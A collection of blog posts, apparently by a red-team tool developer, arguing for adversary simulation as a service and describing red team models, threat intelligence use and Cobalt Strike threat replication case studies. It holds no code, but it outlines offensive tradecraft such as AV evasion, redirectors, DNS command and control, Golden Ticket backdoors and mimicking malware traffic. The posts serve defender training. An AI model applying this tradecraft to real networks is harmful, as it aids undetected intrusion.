Adversary Simulations are not Penetration Testing. There’s some overlap in the skills necessary, but it’s smaller than most might think. For Adversary Simulations to really mature as a service, we will need training classes that emphasize post-exploitation, system administration, and how to digest Threat Intelligence reports. Right now, the courses meant for high-end red teams are the best options.

Adversary Simulation Services

Adversary Simulation Services [someone pick a better acronym] are driven by the need to validate and improve Security Operations. This isn’t a mature-organization-only problem. If an organization is mature enough to hire external security consultants for vulnerability assessments AND the organization invests in security operations, they will benefit from some service that validates or enhances this investment.

What makes Adversary Simulation interesting is it’s an opportunity for a consulting firm to specialize and use their strengths.

If you work for a threat intelligence company, Adversary Simulations are your opportunity to use that Threat Intelligence to develop and execute scenarios to validate and improve your customer’s use of the Threat Intelligence you sell them. iSight Partners is on the cutting edge of this right now. It’s so cutting edge, they haven’t even updated their site to describe this service yet. Their concept is similar to how I described an Aggressor at ShowMeCon in May 2014:

If you’re a penetration testing company that focuses on SCADA; you have an opportunity to develop scenarios that match situations unique to your customers and sell them as a service that others outside your niche can’t offer.

Some organizations outsource most of their security operations to a third-party provider. That’s fine. If you work with these organizations, you can still sell services to help your customers validate this investment. Look into MI SEC’s Security Exercise model and come up with scenarios that take one to two days of customer time to execute and give feedback.

If you’re an organization on the high-end working to build a hunt capability–Adversary Simulation is important to you too. You can’t just deploy Hunt Operators and assume they’re ready to tackle the scariest APT out there. An Adversary Simulation Team can play as the scrimmage team to train and evaluate your Hunt capability.

For any organization that you work with, an Adversary Simulation is an opportunity to offer them new services to validate their security operations. There are different models for Adversary Simulations. Each of these models is a fit for different organizational maturity levels.

I predict that Adversary Simulations will become the bulk of the Penetration Testing services and tools market in the future. Now’s a good time to help define it.

Models for Red Team Operations

Recently, I had an email from someone asking for a call to discuss different models of red team operations. This gentlemen sees his team as a service provider to his parent organization. He wants to make sure his organization sees his team as more than just dangerous folks with the latest tools doing stuff no one understands. This is a fair question.

In this post, I’ll do my best to share different models I see for red team operations. By operations, I mean emulating the activities of a long-term embedded adversary in a network, one that works from a remote location. This ability to gain, maintain, and take action on access over a (potentially) long period of time is a different task from analyzing an application to find flaws or quickly enumerating a large network to identify misconfigurations and unpatched software.

You may ask, what’s the point of emulating a (remote) long-term embedded adversary? Two words: Security Operations. I’m seeing a shift where organizations are leveraging their red assets to validate and improve their ability to detect and respond to intrusions.

With all of that said, let’s go through a few of the different models:

Full Scope Penetration Tests

A full scope penetration test is one where a hired or internal team attempts to gain a foothold into their customers environment, elevate their rights, and steal data or achieve some desired effect. These engagements mimic the targeted attack process an external actor executes to break into an organization. When a lot of my peers think about red team operations these assessments are immediately what comes to mind.

Full scope penetration tests provide a data point about the state of a security program, when all aspects are exercised in concert against an outside attacker. Unfortunately, full scope assessments are as much a test of the assessor as they are of the organization that commissioned these tests. They are also expensive and assessors have to cope with restrictions that are not placed onto a real adversary [less time, fewer resources, compliance with the law].

Given time, resources, and competent execution, a full scope engagement can offer valuable insight about how an external actor sees an organization’s posture. These insights can help identify defensive blind spots and other opportunities for improvement. These engagements are also useful to re-educate executives who bought into the hype that their organization is un-hackable. Making this point seems to be a common driver for these assessments.

Long-term Operations

I see several red teams building long-term operations into their services construct. The idea is that no organizational unit exists in isolation of the others. The organizational units that commission engagements from their internal assets are not necessarily the organizational units that are most in need of a look from a professional red team. To deal with these situations, some red teams are receiving cart blanche to gain, elevate, and maintain access to different organizational units over long period time. These accesses are sometimes used to seed or benefit future engagements against different organizational units.

Long-term Operations serve another purpose. They allow the red team to work towards the “perfect knowledge” that a long-term embedded adversary would have. This perfect knowledge would include a detailed network map, passwords for key accounts, and knowledge about which users perform which activities that are of value to a representative adversary.

It’s dangerous to require that each red team engagement start from nothing with no prior knowledge of a target’s environment. A long-term embedded adversary with a multi-year presence in a network will achieve something that approximates perfect knowledge.

For some organizations, I’m a fan of this approach and I see several potential benefits to it. The perfect knowledge piece is one benefit, but that is something an organization could white card if they wanted to. There’s another key benefit: our common understanding of long-term offensive operations is weak at best. Maintaining and acting on access over a long period of time requires more than a good persistence script and a few VPS nodes. The organizations that take time to invest in and get good at this approach will find themselves with interesting insights about what it takes to keep and maintain access to their networks. These insights should help the organization make investments into technologies and processes that will create real pain for a long-term embedded actor.

War Games

Several organizations stage red vs. blue war games to train and evaluate network defense staff. These exercises usually take place in a lab environment with multiple blue teams working to defend their representative networks against a professional opposing force. The role of this opposing force is to provide a credible adversary to train participants and keep pressure on them throughout the event.

Each of these events is different due to their different goals. Some events white card the access step completely. Some also white card the perfect knowledge of the long-term embedded adversary. It all depends on the event’s training objectives and how the organiser’s want to use their professional red team assets.

To an outsider, large scale Red vs. Blue events look like a chaotic mess. The outsider isn’t wrong. Red vs. Blue events are a chaotic mess. They’re chaotic because they’re fast paced. Some compress a multi-year attack scenario into an event that spans days or weeks.

There’s value to these events though. These events provide a safe opportunity to exercise processes and team roles in a fast-paced setting. They’re also an opportunity to field immature or new technologies to understand the benefit they can provide. Unlike more structured tests, these events also give blue participants opportunities to observe and adapt to a thinking adversary. Done right, these events encourage full disclosure between red and blue at the end so participants can walk away with an understanding of how their blue TTPs affected the professional adversary.

Threat Scenarios / Cyber Security Exercises / Attack Simulations

Another use for red assets is to help design and execute cyber security exercises to train and assess network defense teams. These exercises usually start with a plausible scenario, a representative or real actor, and a realistic timeline.

The red asset’s job is to generate realistic observable activity for each part of the timeline. The red operator is given every white card they need to execute their observable effect. Each of these carefully executed items becomes a discussion point for later.

These exercises are a great way to validate procedures and train blue operators to use them. Each unique generated activity is also an opportunity to identify procedure and technology gaps in the organization.

While this concept is new-ish to security operations, it’s by no means new. NASA has had a concept of an Integrated Training Team led by a Simulation Supervisor since the beginning of the US space program. NASA’s lessons learned in this area is a worthwhile study for security professionals. When I think about emerging job role of the Threat Emulator, I see these folks as the equivalent of NASA’s Simulation Supervisors, but for Security Operations.

Who is doing this?

I see several red teams re-organizing themselves to serve their organizations in different ways from before. Established teams with custom tools for long-term operations are trying to retool for engagements that require full disclosure afterwards. Other teams mirror external consulting firms in their services. These teams are now trying to give their leadership a global long-term perspective on their organization’s security posture. Day-to-day these teams are working towards the credibility, capability, and skills to bring the benefits of long-term operations to their organization. I see a trend where many internal red teams are expanding their services to benefit their organization’s at the tactical and strategic levels. It’s an exciting time to be in this area.

References on Adversary Simulations

A friend recently made the statement that my blog posts have so many videos and links that it would take someone a week to go through all of the material. This comment was made in reference to the blog post exploring the Adversary Simulation space. This topic is near and dear to my heart, so I’d like to dissect the links and videos in the post and why I think they’re worthwhile for you to read.

Why do we need Adversary Simulation?

Penetration Testing with Honest-to-Goodness Malware [DarkReading.com]

This commentary by Gunter Ollmann describes penetration testing as a service with some value, but one that does not reflect its origin: emulating the adversary’s techniques. Maybe the advanced adversary uses Nessus from the target’s conference room and we’re both wrong? Who knows. I like this article because it discusses why adversary emulation is important, it makes a fair argument about why pen testing [still valuable] isn’t a substitute for this, and it proposes a solution to the problem.

Purple Teaming for Success [SecureIdeas]

Kevin Johnson and James Jardine took the time to put together a blog post and webcast that describes their take on purple teaming. I’m not a fan of the term purple teaming and I see it as overbroad, but Kevin and James provide good arguments about why new models for red and blue to work together make sense without prescribing a solution that’s more of the same old pen tester stuff.

How do I see Adversary Simulations?

Puttering my Panda and Other Threat Replication Case Studies [Gratuitous Self-link]

As a tool developer, I look at problems like Adversary Simulations, and ask what my tools do to support these things. Cobalt Strike has some nifty technologies for Adversary Simulations. It contains several ready-to-use user-driven attacks to get a foothold. It has a phishing tool that will ingest an existing email and repurpose it into attack. And, it has Malleable C2, a technology that lets you change what its Beacon payload looks like on the wire. You can fool an analyst into thinking they’re dealing with another piece of malware. This blog post shows three case studies to reproduce tradecraft and indicators from public reports on advanced persistent threat activity.

Hacking to Get Caught: A Concept for Adversary Replication [Yeah, me me me]

This is a May 2014 talk on the Adversary Replication concept. In this talk, I work to make a case that an Adversary Simulation is Red Teaming guided by Threat Intelligence. The model I proposed is meant to exercise a customer’s process to analyze and attribute an attack. My thoughts have evolved since this talk but I think it’s still worth watching if you’re really interested in this topic.

What are my favorite Adversary Simulation references?

Red Teaming: Using Cutting-Edge Threat Simulation to Harden the Microsoft Enterprise Cloud [Microsoft.com]

This whitepaper was sent to me at 9pm the day before I published my post on Adversary Simulation. It’s awesome! Microsoft describes the same concept in their own words. Key to their approach is what they call an innovative “Assume Breach” strategy. Of everything I reference in this post, I consider this paper the most important. I recommend that you go read it.

Threat Models that Exercise Your SIEM and Incident Response [Nick Jacob]

This talk describes how to build a threat model and derive from it a story board for a quarterly cyber security exercise. Nick goes into the nitty gritty of how they work to provide the observables that support this sequence of events and give analysts something meaningful to chase. He also digs into metrics as well.

Seeing Purple: Hybrid Security Teams for the Enterprise [Mark Kikta]

This is another talk from an MISEC member that discusses the periodic cyber security exercise and how to support it. I think Mark, Nick, and Wolfgang are dead on with their insights and if I had a magical wand, everyone who works in this space would watch these talks.

Indecent (Penetration Testing) Proposal

A customer reaches out to you. They’ve spent the money. They have a network defense team that innovates and actively hunts for adversary activity. They own the different blinky boxes. They have a highly-rated endpoint protection in their environment. They’re worried about these cyber attacks they see in the news. Despite this investment, they don’t know how well it works. The CEO thinks they’re invincible. The CISO has his doubts and the authority and resources to act on these doubts. They want to know where their program is at. They call you.

You run through the options. You dismiss the idea of looking at their vulnerability management program. They have this and they receive penetration testers on a semi-regular basis. They’re comfortable that someone’s looking at their attack surface. They’re still worried. What about something very targeted? What if someone finds a way that they and the myriad of vendors they worked with didn’t know about.

After discussion, you get to the heart of it. They want to know how effective their network defense team is at detecting and mitigating a successful breach. The gears start to turn in your mind. You know this isn’t the time to use netcat to simulate exfiltration of data. You can download some known malicious software and run it. Or, better, you could go to one of the underground forums and pay $20 for one of the offensive showpieces available for sale. Your minded quickly flashes to a what-if scenario. What happens if you go this way and introduce a backdoor into your customer’s environment. You shake your head and promise yourself that you will look at other options later.

Wisely, you ask a few clarifying questions. You ask, what type of breach are they worried about? Of the recent high-profile breaches, what’s the one that makes them think, “could that be us?” Before you know it you’re on a plane to New York with a diverse team. You bring an offensive expert from your team, she is a cross between operator and developer. You also bring a new hire who used to work as a cyber threat analyst within the US intelligence community. You engage with the customer’s team, which includes trusted agents from the network defense team who will not tell their peers about the upcoming engagement. The meeting is spent productively developing a threat model and a timeline for a hypothetical breach.

Your customer introduces you to another player in this engagement. Your customer pays for analyst services from a well known threat intelligence company. This company is known for working intrusion response for high-profile breaches. A lesser known service is the strategic guidance, analysis support, and reports they provide their customers on a subscription basis. This analyst briefs you on a real actor with capability and intent to target a company like your customer. The hypothetical breach scenario you made with your customer is amiable to this actor’s process. The analyst briefs your team on this actor’s capabilities and unique ways of doing business. Your customer doesn’t know what they want here, but they ask if there’s a way you can use this information to make your activity more realistic, please do so.

You and your team leave the customer’s site and discuss today’s meetings with a fast energy. The customer wants to hire you to play out that hypothetical breach in their environment, but they want to do this in a cost effective way. A trusted insider will assist you with the initial access. It’s up to you to evade their blinky boxes and to work slowly. Paradoxically, the customer wants you to work slow, but they want to put a time limit on the activity as well. They’re confident that with unlimited time, you could log the right keystrokes, and locate the key resources and systems in their network. To keep the engagement tractable, they offer to assign a trusted agent to your team. This agent will white card information to allow you to move forward with the breach storyline.

The customer’s interest is the hypothetical breach and the timeline of your activity. They don’t expect their network defense team to catch every step. But, they want to know every step you took. After the engagement, they plan to analyze everything you did and look at their process and tools. They’ll ask the tough questions. How did they do? What did they see, but dismiss as benign? What didn’t they see and why? Sometimes it’s acceptable that an activity is too far below a noise threshold to catch. That’s OK. But, sometimes, there’s a detection or action opportunity they miss. It’s important to identify these and look at how to do better next time.

You look at this tall order. It’s a lot. This isn’t something your team normally does. You know you can’t just go in and execute. Your new hire with the intel background smiles. This is a big opportunity. Your developer and analyst work together to make a plan to meet the customer’s needs. Your intent is to execute the breach timeline but introduce tradecraft of the actor the threat intelligence company briefed you on. These few tricks you plan to borrow from the actor will show the customer’s team something they haven’t seen before. It will make for a good debrief later.

This engagement will require some upfront investment from your team and it may require a little retooling. You’ll need to analyze each piece of your kit and make sure it can work with the constraints of your customer’s defensive posture. You verify that you have artifacts that don’t trigger their anti-virus product. Some of the cloud anti-virus products have made trouble for your team in the past. You look at your remote access tool options. You need a payload that’s invisible to the blinky boxes and their automatic detection. If you get caught, you want to know ingenuity and analysis made it happen. You won’t give yourself up easily. At least, not in the beginning.

You also want to know that you can operate slowly. Your favorite penetration testing tools aren’t built for this. Big questions come up. How will you exfiltrate gigabytes of data, slowly and without raising alarms? You know you’ll need to build something or buy it. You also work to plan the infrastructure you’ll need to support each phase of the breach timeline. You know, for this particular engagement, it makes no sense to have all compromised systems call home to the one Kali box your company keeps in a DMZ.

As all of this planning takes place, you pause and reflect. You got into this business to make your customers better. You built a team and you convinced your management to pay them what they’re worth. You carry the weight of making sure that team is constantly engaged. Sometimes this means taking the less sexy work. Unfortunately, your competitors are on a race to the bottom. Everyone sells the same scans and vulnerability verification as penetration tests. It keeps getting worse. You know you’ll lose your best people if you try to compete with this way. This engagement brings new energy to your team.

This mature customer is willing to pay for this service. The value to them is clear. They want to know how well their security operations stands up to a real world attack. They understand that this is a task that requires expertise. They’ll pay, but they can’t and won’t pay for a long timeline. The white carding is the compromise.

You’re excited. This is something that will use the expertise you’ve collected into a cohesive team. Your customer appreciates how real the threat is. You make plans. Big plans. You wonder who else might pay for this service. You go to your sales person and brief them on the customer and this engagement. Your sales person nods in agreement. “Yes, I see it too”.

When You Know Your Enemy

TL;DR This is my opinion on Threat Intelligence: Automated Defense using Threat Intelligence feeds is (probably) rebranded anti-virus. Threat Intelligence offers benefit when used to hunt for or design mitigations to defeat advanced adversaries. Blue teams that act on this knowledge have an advantage over that adversary and others that use similar tactics.

Threat Intelligence is one of those topics you either love to scoff at or embrace. In this post, I’ll share my hopes, dreams, and aspirations for the budding discipline of Threat Intelligence.

I define Threat Intelligence as actionable adversary-specific information to help you defend your network. There are several firms that sell threat intelligence. Each of these firms track, collect on, and produce reports and raw indicator information for multiple actors. What’s in these reports and how these companies collect their information depends on the company and the means and relationships at their disposal.

How to best get value from Threat Intelligence is up for debate and there are many theories and products to answer this question. The competing ideas surround what is actionable information and how you should use it.

Anti-virus Reborn as… Anti-virus

One theory for Threat Intelligence is to provide a feed with IP addresses, domain names, and file hashes for known bad activity. Customers subscribe to this feed, their network defense tools ingest it, and now their network is automatically safe from any actor that the Threat Intelligence provider reports on. Many technical experts scoff at this, and not without reason. This is not far off from the anti-virus model.

The above theory is NOT why I care about Threat Intelligence. My interest is driven by my admittedly skewed offensive experiences. Let me put you into my shoes for a moment…

I build hacking tools for a living. These tools get a lot of use at different Cyber Defense Exercises. Year after year, I see repeat defenders and new defenders. For some defenders, Cobalt Strike is part of their threat model. These teams know they need to defend against Cobalt Strike capability. They also know they need to defend against the Metasploit Framework, Dark Comet, and other common tools too. These tools are known. I am quick to embrace and promote alternate capabilities for this exact reason. Diversity is good for offense.

I have to live with defenders that have access to my tools. This forces me to come up with ways for my power users and I to stay ahead of smart defenders. It’s a fun game and it forces my tools to get better.

The low hanging fruit of Threat Intelligence makes little sense to me. As an attacker, I can change my IP addresses easily enough. I stand up core infrastructure, somewhere on the internet, and I use redirectors to protect my infrastructure’s location from network defenders. Redirectors are bounce servers that sit between my infrastructure and the target’s network. I also have no problem changing my hashes or the process I use to generate my executable and DLL artifacts. Cobalt Strike has thought out workflows for this.

I worry about the things that are harder to change.

Why is notepad.exe connecting to the Internet?

Each blue team will latch on to their favorite indicators. I remember one year many blue teams spoke of the notepad.exe malware. They would communicate with each other about the tendency for red team payloads to inject themselves into notepad.exe. This is a lazy indicator, originating from the Metasploit Framework and older versions of Cobalt Strike. It’s something a red operator can change, but few bother to do so. I would expect to see this type of indicator in the technical section of a Threat Intelligence report. This information would help a blue team get ahead of the red teams I worked with that year.

If you’d like to see how this is done, I recommend that you read J.J. Guy‘s case study on how to use Carbon Black to investigate this type of indicator.

Several blue teams worry about Cobalt Strike and its Beacon payload. This is my capability to replicate an advanced adversary. These teams download the trial and pick apart my tool to find indicators that they can use to find Beacon. These teams know they can’t predict my IP addresses, which attack I will use, or what file I will touch disk with. There are other ways to spot or mitigate an attacker’s favorite techniques.

DNS Command and Control

One place you can bring hurt to an attacker is their command and control. If you understand how they communicate, you can design mitigations to break this, or at least spot their activity with the fixed indicators in their communication. One of my favorite stories involves DNS.

Cobalt Strike has had a robust DNS communication capability since 2013. It’s had DNS beaconing since late 2012. This year, several repeat blue teams had strategies to find or defeat DNS C2. One team took my trial and figured out that parts of my DNS communication scheme were case sensitive. They modified their DNS server to randomly change the casing of all DNS replies and break my communication scheme.

This helped them mitigate red team activity longer than other blue teams. This is another example where information about your adversary can help. If you know there’s a critical weakness in your adversary’s toolchain, use that weakness to protect your network against it. This is not much different from spoofing a mutex value or changing a registry option to inoculate a network against a piece of malware.

This story doesn’t end there though. This team fixated on DNS and they saw it as the red team’s silver bullet. Once we proved we could use DNS, we put our efforts towards defeating the proxy restrictions each team had in place. We were eventually able to defeat this team’s proxy and we had another channel to work in their network. We used outbound HTTP requests through their restrictive proxy server to control a host and pivot to others. They were still watching for us over DNS. The lesson? Even though your Threat Intelligence offers an estimate of an adversary’s capability, don’t neglect the basics, and don’t assume that’s the way they will always hit you. A good adversary will adapt.

To Seek Out New Malware in New Processes…

After a National CCDC event, a student team revealed that they would go through each process and look for WinINet artifacts to hunt Beacon. This is beautiful on so many levels. I build technologies, like Malleable C2, to allow a red operator to customize their indicators and give my payload life, even when the payload is known by those who defend against it. This blue team came up with a non-changing indicator in my payload’s behavior. Fixed malware behavior or artifacts in memory are things a Threat Intelligence company can provide a client’s hunt team. These are tools to find the adversary.

It’s (not) always about the Malware

The red teams I work with quickly judge which teams are hard and which teams are not. We adjust our tradecraft to give harder teams a better challenge. There are a few ways we’ll do this.

Sometimes I know I can’t put malware on key servers. When this happens, I’ll try to live on the systems the defenders neglect. I then use configuration backdoors and trust relationships to keep access to the servers that are well protected. When I need to, I’ll use RDP or some other built-in tool to work with the well protected server. In this way, I get what I need without alerting the blue team to my activity. Malware on a target is not a requirement for an attacker to accomplish their goal.

CrowdStrike tracks an actor they call DEEP PANDA. This actor uses very similar tradecraftIf a blue team knew my favored tradecraft and tricks in these situations, they could instrument their tools and scripts to look for my behavior.

A few points…

You may say, that’s one adversary. What about the others? There are several ways to accomplish offensive tasks and each technique has its limitations (e.g., DNS as a channel). If you mitigate or detect a tactic, you’ll likely affect or find other adversaries that use that tactic too. If an adversary comes up with something novel and uses it in the wild, Threat Intelligence is a way to find out about it, and stay ahead of advancing adversary tradecraft. Why not let the adversary’s offensive research work for you?

You may also argue that your organization is still working on the basics. They’re not ready for this. I understand. These concepts are not for every organization. If you have a mature intrusion response capability, these are ideas about how Threat Intelligence can make it better. These concepts are a complement to, not a replacement for, the other best practices in network defense.

And…

You’ll notice that I speak favorably of Threat Intelligence and its possibilities. I read the glossy marketing reports these vendors release to tease their services. The information in the good reports isn’t far off from the information blue teams use to understand and get an edge in different Cyber Defense Exercises.

In each of these stories, you’ll notice a common theme. The red team is in the network or will get in the network (Assume Compromise!). Knowledge of the red actor’s tools AND tradecraft helps the blue teams get an advantage. These teams use their adversary knowledge in one of two ways: they either design a mitigation against that tactic or they hunt for the red team’s activity. When I look at Threat Intelligence, I see the most value when it aids a thinking blue operator in this way. As a red operator, this is where I’ve seen the most challenge.

Further Reading

  • Take a look at The Pyramid of Pain by David Bianco. This post discusses indicators in terms of things you deny the adversary. If you deny the adversary an IP address, you force them to take a routine action. If you deny the adversary use of a tool, you cause them a great deal of pain. David’s post is very much in the spirit of this one. Thanks to J.J. Guy for the link.

Adversary Simulation Becomes a Thing…

There is a growing chorus of folks talking about simulating targeted attacks from known adversaries as a valuable security service.

The argument goes like this: penetration testers are vulnerability focused and have a toolset/style that replicates a penetration tester. This style finds security problems and it helps, but it does little to prepare the customer for the targeted attacks they will experience.

Adversary simulation is different. It focuses on the customer’s ability to deal with an attack, post-compromise. These assessments look at incident response and provide a valuable “live fire” training opportunity for the analysts who hunt for and respond to incidents each day.

The organizations that buy security products and services are starting to see that compromise is inevitable. These organizations spend money on blinky boxes, people, services, and processes to deal with this situation. They need a way to know whether or not this investment is effective. Adversary simulation is a way to do this.

What is adversary simulation?

There’s no standard definition for adversary simulation, yet. It doesn’t even have an agreed upon term. I’ve heard threat emulationpurple teaming, and attack simulation to discuss roughly the same concept. I feel like several of us are wearing blindfolds, feeling around our immediate vicinity, and we’re working to describe an elephant to each other.

From the discussions on this concept, I see a few common elements:

The goal of adversary simulation is to prepare network defense staff for the highly sophisticated targeted attacks their organization may face.

Adversary simulation assumes compromise. The access vector doesn’t matter as much as the post-compromise actions. This makes sense to me. If an adversary lives in your network for years, the 0-day used three years ago doesn’t really matter. Offensive techniques, like the Golden Ticket, turn long-term persistence on its head. An adversary may return to your network and resume complete control of your domain at any time. This is happening.

Adversary simulation is a white box activity, sometimes driven by a sequence of events or a story board. It is not the goal of an adversary simulation exercise to demonstrate a novel attack path. There are different ways to come up with this sequence of events. You could use a novel attack from a prior red team assessment or real-world intrusion. You could also host a meeting to discuss threat models and derive a plausible scenario from that.

There’s some understanding that adversary simulation involves meaningful network and host-based indicators. These are the observables a network defense team will use to detect and understand the attacker. The simulated indicators should allow the network defense team to exercise the same steps they would take if they had to respond to the real attacker. This requires creative adversary operators with an open mind about other ways to hack. These operators must learn the adversary’s tradecraft and cobble together something that resembles their process. They must pay attention to the protocols the adversary uses, the indicators in the communication, the tempo of the communication, and whether or not the actor relies on distributed infrastructure. Host-based indicators and persistence techniques matter too. The best training results will come from simulating these elements very closely.

Adversary simulation is inherently cooperative. Sometimes, the adversary operator executes the scenario with the network defense team present. Other times the operator debriefs after all of the actions are executed. In both cases, the adversary operators give up their indicators and techniques to allow the network defense team to learn from the experience and come up with ways to improve their process. This requirement places a great burden on an adversary simulation toolkit. The adversary operators need ways to execute the same scenario with new indicators or twists to measure improvement.

Hacking to get Caught – A Concept for Adversary Replication and Penetration Testing

Threat Models that Exercise your SIEM and Incident Response

Comprehensive testing Red and Blue Make Purple

Seeing purple hybrid security teams for the enterprise

Isn’t this the same as red teaming?

I see a simulated attack as different from a red team or full scope assessment. Red Team assessments exercise a mature security program in a comprehensive way. A skilled team conducts a real-world attack, stays in the network, and steals information. At the end, they reveal a (novel?) attack path and demonstrate risk. The red team’s report becomes a tool to inform decision makers about their security program and justify added resources or changes to the security program.

A useful full scope assessment requires ample time and they are expensive.

Adversary simulation does not have to be expensive or elaborate. You can spend a day running through scenarios once each quarter. You can start simple and improve your approach as time goes on. This is an activity that is accessible to security programs with different levels of budget and maturity.

How does this relate to Cyber Defense Exercises?

I participate in a lot of Cyber Defense Exercises. Some events are setup as live-fire training against a credible simulated adversary. These exercises are driven off of a narrative and the red team executes the actions the narrative requires. The narrative drives the discussion post-action. All red team activities are white box, as the red team is not the training audience. These elements make cyber defense exercises very similar to adversary simulation as I’m describing here. This is probably why the discussion perks up my ears, it’s familiar ground to me.

There are some differences though.

These exercises don’t happen in production networks. They happen in labs. This introduces a lot of artificiality. The participants don’t get to “train as they fight” as many tools and sensors they use at home probably do not exist in the lab. There is also no element of surprise to help the attacker. Network defense teams come to these events ready to defend. These events usually involve multiple teams which creates an element of competition. A safe adversary simulation, conducted on a production network, does not need to suffer from these drawbacks.

Why don’t we call it “Purple Teaming”?

Purple Teaming is a discussion about how red teams and blue teams can work together. Ideas about how to do this differ. I wouldn’t refer to Adversary Simulation as Purple Teaming. You could argue that Adversary Simulation is a form of Purple Teaming. It’s not the only form though. Some forms of purple teaming have a penetration tester sit with a network defense team and dissect penetration tester tradecraft. There are other ways to hack beyond the favored tricks and tools of penetration testers.

Let’s use lateral movement as an example:

A penetration tester might use Metasploit’s PsExec to demonstrate lateral movement, help a blue team zero in on this behavior, and call it a day. A red team member might drop to a shell and use native tools to demonstrate lateral movement, help a blue team understand these options, and move on.

An adversary operator tasked to replicate the recent behavior of “a nation-state affiliated” actor might load a Golden Ticket into their session and use that trust to remotely setup a sticky keys-like backdoor on targets and control them with RDP. This is a form of lateral movement and it’s tied to an observed adversary tactic. The debrief in this case focuses on the novel tactic and potential strategies to detect and mitigate it.

Do you see the difference? A penetration tester or red team member will show something that works for them. An adversary operator will simulate a target adversary and help their customer understand and improve their posture against that adversary. Giving defenders exposure and training on tactics, techniques, and procedures beyond the typical penetration tester’s arsenal is one of the reasons adversary simulation is so important.

What are the best practices for Adversary Simulation?

Adversary Simulation is a developing area. There are several approaches and I’m sure others will emerge over time…

Traffic Generation

One way to simulate an adversary is to simulate their traffic on the wire. This is an opportunity to validate custom rules and to verify that sensors are firing. It’s a low-cost way to drill intrusion response and intrusion detection staff too. Fire off something obvious and wait to see how long it takes to detect it. If they don’t, you immediately know you have a problem.

Marcus Carey’s vSploit is an example of this approach. Keep an eye on his FireDrill.me company, as he’s expanding upon his original ideas as well.

DEF CON 19 – Metasploit vSploit Modules

Use Known Malware

Another approach is to use public malware on your customer’s network. Load up DarkComet, GhostRAT, or Bifrost and execute attacker-like actions. Of course, before you use this public malware, you have to audit it for backdoors and make sure you’re not introducing an adversary into your network. On the bright side, it’s free.

This approach is restrictive though. You’re limiting yourself to malware that you have a full toolchain for [the user interface, the c2 server, and the agent]. This is also the malware that off-the-shelf products will catch best. I like to joke that some anti-APT products catch 100% APT, so long as you limit your definition of APT malware to Dark Comet.

This is probably a good approach with a new team, but as the network security monitoring team matures, you’ll need better capability to challenge them and keep their interest.

Use an Adversary Simulation Tool

Penetration Testing Tools are NOT adequate adversary simulation tools. Penetration Testing Tools usually have one post-exploitation agent with limited protocols and fixed communication options. If you use a penetration testing tool and give up its indicators, it’s burned after that. A lack of communication flexibility and options makes most penetration testing tools poor options for adversary simulation.

Cobalt Strike overcomes some of these problems. Cobalt Strike’s Beacon payload does bi-directional communication over named pipes (SMB), DNS TXT records, DNS A records, HTTP, and HTTPS. Beacon also gives you the flexibility to call home to multiple places and to vary the interval at which it calls home. This allows you to simulate an adversary that uses asynchronous bots and distributed infrastructure.

The above features make Beacon a better post-exploitation agent. They don’t address the adversary replication problem. One difference between a post-exploitation agent and an adversary replication tool is user-controlled indicators. Beacon’s Malleable C2 gives you this. Malleable C2 is a technology that lets you, the end user, change Beacon’s network indicators to look like something else. It takes two minutes to craft a profile that accurately mimics legitimate traffic or other malware. I took a lot of care to make this process as easy as possible.

Malleable Command and Control

Cobalt Strike isn’t the only tool with this approach either. Encripto released Maligno, a Python agent that downloads shellcode and injects it into memory. This agent allows you to customize its network indicators to provide a trail for an intrusion analyst to follow.

Malleable C2 is a good start to support adversary simulation from a red team tool, but it’s not the whole picture. Adversary Simulation requires new story telling tools, other types of customizable indicators, and it also requires a rethink of workflows for lateral movement and post-exploitation. There’s a lot of work to do yet.

Putter Panda – Threat Replication Case Study

Will Adversary Simulation work?

I think so. I’d like to close this post with an observation, taken across various exercises:

In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary. This is part of what allows these adversaries the freedom to live and work on so many networks. An inability to find these adversaries creates a sense of complacency. If I can’t see them, maybe they’re not there?

By exercising a network defense team and providing actionable feedback with useful details, you’re giving that team a way to understand their level. The teams that take the debrief seriously will figure out how to improve and get better.

Over time, you will find that these teams, spurred by your efforts, are operating at a level that will challenge your ability to create a meaningful experience for them. I’ve provided repeat red team support to many events since 2011. Each year I see the growth of the return teams that my friends and I provide an offensive service to. It’s rewarding work and we see the difference.

Heed my words though: the strongest network defense teams require a credible challenge to get better. Without adversary simulation tools [built or bought], you will quickly exhaust your ability to challenge these teams and keep up with their growth.

Puttering my Panda and other Threat Replication Case Studies

Cobalt Strike 2.0 introduced Malleable C2, a technology to redefine network indicators in the Beacon payload. What does this mean for you? It means you can closely emulate an actor and test intrusion response during a penetration test.

In this blog post, I’ll take you through three threat replication case studies with Cobalt Strike. In each case study, we will emulate the attacker’s method to get in, we will use a C2 profile that matches their malware, and we will analyze what this activity looks like in Snort and Wireshark.

Putter Panda

Putter Panda is an actor described by a June 2014 Intelligence Report from CrowdStrike. In this video, we replicate Putter Panda’s HTTP CLIENT malware and use a Document Dropper attack to deliver it.

String of Paerls

String of Paerls is an intrusion set described by Sourcefire’s Cisco’s VRT. In this video, we replicate the actor’s C2 with Beacon and use a macro embedded in a Word document to attack a target. We also reproduce the attacker’s phish as well.

Energetic Bear / Crouching Yeti / Dragonfly

This actor, known by many names, allegedly targets the energy sector. The best information on this actor came from pastebin.com without a slick PDF or PR team to back it up. In this video, we replicate this actor’s havex trojan with Beacon and use a Java drive-by exploit to attack a target.

With the right technologies, threat replication isn’t hard. Read about and understand the actor’s tradecraft. Craft a profile that uses the actor’s indicators. Launch an attack and carry out your assessment. Threat Replication is a way to exercise intrusion response and see how well a security program stands up to these actors.